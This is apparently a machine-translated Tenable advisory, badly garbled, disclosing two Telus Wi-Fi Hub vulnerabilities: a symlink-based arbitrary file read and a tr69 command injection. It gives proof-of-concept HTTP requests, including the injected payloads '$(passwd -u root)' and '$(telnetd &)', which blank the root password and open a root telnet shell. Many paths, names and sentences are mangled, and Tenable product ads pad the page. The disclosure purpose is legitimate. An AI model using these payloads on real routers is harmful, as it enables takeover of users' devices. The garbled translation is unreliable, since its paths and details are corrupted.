脸书 Google+ 微博 LinkedIn YouTube系统 RSS系统 菜单类 搜索 资源-博客 资源-Webinar 资源-报表 资源-事件 图标#066 图标_067 图标_068 图标_069 图标070

特拉斯Wi-Fi枢纽多易用性

中度

简表

CVE-2021-20121 任意文件通过DLNA/UPnP符号链接阅读
CVSS:3.0/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N-基础评分4.0

TelusWi-Fi中心(PRV65B444A-S-TS)3.00.20版易受认证任意文件阅读拥有物理访问设备认证用户可编程并连接专用USB驱动器设备,并编译数列设备网络接口请求数列,从设备读取任意文件

实际访问设备认证用户可读取设备任意文件,创建USB设备专用文件符号链接,并连接TelusWiFi枢纽USB设备

微弱风险不高,但实用工具从Teluswifi设备读取本地文件,而终端用户通常无法访问举例说,它用于从设备获取/sr/sbin/a

概念证明

利用这个问题需要多步处理,所以没有离散单价po采取了下列步骤:

1)格式化新USB驱动测试期间我们格式化驱动

2) 创建符号链接到期望文件,命名为.wav文件

在此例中,测试期间,我们创建了连接/usr/sbin/

s/sr/sbin/

命名为.wav文件,因为媒体服务器不会试图跟踪symlink/service文件

3)同时认证Teluswifihub免选USB媒体服务器设置中的“分享全部磁盘”。需要分享两个文件夹

3a优先通过操纵默认请求分享/sr/

3b.第二位保存默认共享文件夹 /tm/media/

4) 新建共享文件夹并设设置,拦截请求保存共享文件夹设置并编辑参数,以便共享文件夹路径指向/usr//代之以/tm/media/

4a首项请求看起来类似, 保证共享文件夹( 即85204000100参数)%2fusr

POST/aply_abstrict.cgi HTTP/1.1
宿主:192.168.1.254
Cookie:弹出=1SID=3227962981701022755145059489405929628938009301597313811979011735!sel_menu=group_4!defpg=usb_media_edit.htm!sel_tabmenu=idx_53
内容链式166
缓存控制:最大值=0
ec-Ch-Ua:chromium;v=91
sec-Ch-Ua-mobile:
升级无保障请求:1
出处:https://192.168.1.254
Content-Type: application/x-www-form-urlencoded
Mozilla/5.0win64苹果WebKit/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
扩展点:同源
sec-Ferch-Mode:导航
Sec-Ferch-user:
Sec-Ferch-Dest:iframe
Referer: https://192.168.1.254/usb_media_edit.htm?t=1625669939385
接受编码:gzi
Accept-Language: en-US,en;q=0.9
连接:关闭

action=ui_usb_mediaserver&httoken=503916783&submit_button=usb_media.htm&852036000000=1&852042001000=1&852039001000=the_usr_folder&852040001000=%2Fusr&852044001000=APV

4b.第二项请求将仅仅是分享usb设备根目录,它看起来是这样的(对USB设备卷命名为NETHING)

POST/aply_abstrict.cgi HTTP/1.1
宿主:192.168.1.254
Cookie:弹出=1SID=3227962981701022755145059489405929628938009301597313811979011735!sel_menu=group_4!defpg=usb_media_edit.htm!sel_tabmenu=idx_53
内容链度:196
缓存控制:最大值=0
ec-Ch-Ua:chromium;v=91
sec-Ch-Ua-mobile:
升级无保障请求:1
出处:https://192.168.1.254
Content-Type: application/x-www-form-urlencoded
Mozilla/5.0win64苹果WebKit/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
扩展点:同源
sec-Ferch-Mode:导航
Sec-Ferch-user:
Sec-Ferch-Dest:iframe
Referer: https://192.168.1.254/usb_media_edit.htm?t=1625670037516
接受编码:gzi
Accept-Language: en-US,en;q=0.9
连接:关闭

action=ui_usb_mediaserver&httoken=1314025998&submit_button=usb_media.htm&852036000000=1&852042001000=1&852039001000=the_usb_drive&852040001000=%2Ftmp%2Fmedia%2FBMKT-CELRUN-NOTHING&852044001000=APV

5) 共享两个文件夹后,便有可能连接UPnP服务器并下载 httpd.wav,该服务器将实际包含/sr/sbin/使用VLC媒体播放器连接网站Umd.wav,即 http://192.168.1.254:8200/MediaTrojects/108.wav关联文件数将改变不同图例/不同设备

108.wav二进制,下载后可重命名为httpd分析像Ghidra这样的软件,以进一步识别网络接口中的更多漏洞

CVE2021-20122 验证指令注入tr69.htm
CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 基础分数6.8

TelusWi-Fi枢纽(PRV65B444A-S-TS)3.00.20版本受验证指令注入脆弱度的影响,多参数传递tr69_cmd.cgi远程攻击器连接路由器局域网并认证超级用户账号或使用像旁转认证易失CVE2021-2009可用此题运行命令或获取shell作为目标设备root

窗体输入传递tr69.htmtr69_cmd.cgi上传前未净化system()网站调用

tr69.htm通常无法访问,即使是标准管理员用户(推理Telus/超级管理员用户可访问),用户使用验证旁漏洞等工具仍然可以访问CVE2021-2009由CERT协调中心向Telus单独报告

例举用用户名更新tr69配置tr69用户名参数, od调用类似物

snprintf(acStack1192,0x400,"tr69_trigger setvalue Device.ManagementServer.Username=%s", tr69_username);
system(acStack1192);

tr69用户名不净化,攻击者可注入命令像root一样运行explement $69_username将用户名设置为id命令结果,在此例中uid=0(root),因为它剪切第一个空间响应

可用此程序获取root访问设备权限,运行以下两个命令,传递下文作为tr69_username参数序列单切修改

1级$(passwd-uroot)

开关root用户,攻击者可登录root用户默认密码,密码为空

2级$(telnetd&)

并允许攻击者登录为root 无密码,获取设备根壳

概念证明

这两项请求是POST请求,反映上方两步获取根壳CVE2021-2009访问页面 :

PST/js/.%2ftr69cmd.cgi HTTP/1.1
宿主:192.168.1.254
Cookie:弹出=1defpg=tel_call_list.htm!SID=2619653444968050681093056696315576631007695501781801308167720277!sel_tabmenu=idx_1!sel_menu=group_0
内容链度205
缓存控制:最大值=0
ec-Ch-Ua:chromium;v=91
sec-Ch-Ua-mobile:
升级无保障请求:1
出处:https://192.168.1.254
Content-Type: application/x-www-form-urlencoded
Mozilla/5.0win64苹果WebKit/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
扩展点:同源
sec-Ferch-Mode:导航
Sec-Ferch-user:
Sec-Ferch-Dest:iframe
Referer: https://192.168.1.254/tr69.htm
接受编码:gzi
Accept-Language: en-US,en;q=0.9
连接:关闭


httoken=787046719&tr69_enable=1&tr69_url=https%3A%2F%2Fhdm.telus.com&tr69_username=%24%28passwd+-u+root%29&tr69_password=&tr69_mac_prefix=507E5D&tr69_periodInform=1&tr69_PIInterval=86400
PST/js/.%2ftr69cmd.cgi HTTP/1.1
宿主:192.168.1.254
Cookie:弹出=1defpg=tel_call_list.htm!SID=3855262964125098823963634631743348066372904405587005389842148492!sel_tabmenu=idx_1!sel_menu=group_0
内容链度:203
缓存控制:最大值=0
sec-Ch-Ua:非A;Brand;v=99,chromium;v=90
sec-Ch-Ua-mobile:
升级无保障请求:1
出处:https://192.168.1.254
Content-Type: application/x-www-form-urlencoded
Mozilla/5.0win64苹果WebKit/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
扩展点:同源
sec-Ferch-Mode:导航
Sec-Ferch-user:
Sec-Ferch-Dest:iframe
Referer: https://192.168.1.254/tr69.htm?t=1623948576849
接受编码:gzi
Accept-Language: en-US,en;q=0.9
连接:关闭

httoken=1302717927&tr69_enable=1&tr69_url=https%3A%2F%2Fhdm.telus.com&tr69_username=%24%28telnetd+%26%29&tr69_password=&tr69_mac_prefix=507E5D&tr69_periodInform=1&tr69_PIInterval=86400

后两位请求后攻击者可登录为root,23号端口无密码

求解

商家通知说他们正在修补补丁详情请联系Telus

披露时间线

2021年7月13日-向Telus发布可开销问题 Arcadyan
2021年7月23日-从Arcadyan接收响应表示他们正与Telus合作解决问题
2021年7月27日-Telus可接受请求确认
2021年7月27日-Telus回复7月14日确认
2021年9月17日-可点名请求Telus更新状态
2021年10月5日-Arcadyan通知Tenable
2021年10月11日-90天披露日期

TRA建议内所有信息均提供“原封不动”,不提供任何保理,包括隐含可交易性和适切性保证用于特定目的,不保证完整性、准确性或及时性个人和组织负责评估实际或潜在安全漏洞的影响

可租制非常严肃地对待产品安全if you believe你发现我们产品中的脆弱点, 我们请求你与我们合作 快速解决它以保护客户可点信快速响应报告,与研究人员保持通信并快速提供解决方案

关于提交脆弱资料的更多细节,请见我们漏洞报告指南页码

如有问题或更正,请发邮件[email protected]

风险信息

可租咨询ID
TRA-2021-41
信用

埃文格兰特

受影响产品
TelusWi-Fi中心
风险因子
中度

咨询时间线

2021年10月11日-咨询发布
2021年10月11日-CVSS更新CVE-2021-20122评分

可耐受脆弱性管理

前称Tenable.io


完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

可耐受脆弱性管理

前称Tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买

试可穿Nessus专业免费

免费7天

TenableNessus是当今市场最全面的脆弱感扫描器

New-Nessus专家
现可用

奈苏斯专家增加更多特征,包括外部攻击表面扫描能力以及添加域和扫描云基础设施能力点击这里尝试Nessus专家

填表后继续使用NessusPro测试

可买Nessus专业

TenableNessus是当今市场最全面的脆弱感扫描器可租Nessus专业程序帮助脆弱性扫描自动化,在守法周期中省时并允许你加入IT团队

购买多年度许可证并保存添加高级支持访问电话、社区聊天支持全天365天全天24小时

选择您的许可

购买多年度许可证并保存

添加支持培训

tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

tenable.io 付费

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买

可租WebApp扫描试

前称Tenable.ioWeb应用扫描

完全存取最新网络应用扫描服务 设计现代应用安全扫描全在线组合漏洞高精度而不人工重创或干扰关键网络应用现在就签名

可租WebApp扫描实验中也包括可租易用性管理、可租可租鲁明和可租云安全

可租WebApp扫描

前称Tenable.ioWeb应用扫描

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

5 FQDNs

3 578美元

立即购买

试可腾鲁明

可视化并探索接触管理,跟踪随时间推移降低风险,并参照Tenablelumin对等基准

可点Lumin测试中也包括可点易点管理、可点WebApp扫描和可点云安全

可买路明

联系销售代表,看可租Lumin如何帮助你在整个组织中获取洞察力并管理网络风险

试可耐云安全

前称可租.cs

完全无障碍检测并修复云基础设施误配置并观察运行时漏洞注册免费测试了解更多试验过程点击这里

可租云安全测试中也包括可租易用性管理、可租可租鲁明和可租WebApp扫描

联系人a购买可租云安全

联系销售代表了解更多可耐云安全知识,并观察多易登录云账号并在分钟内为云误配置和漏洞获取可见度

试可耐奈苏斯专家免费

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

已经有TenableNessus专业
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

试Nessus免费专家

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

内索斯职业类
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

Baidu
map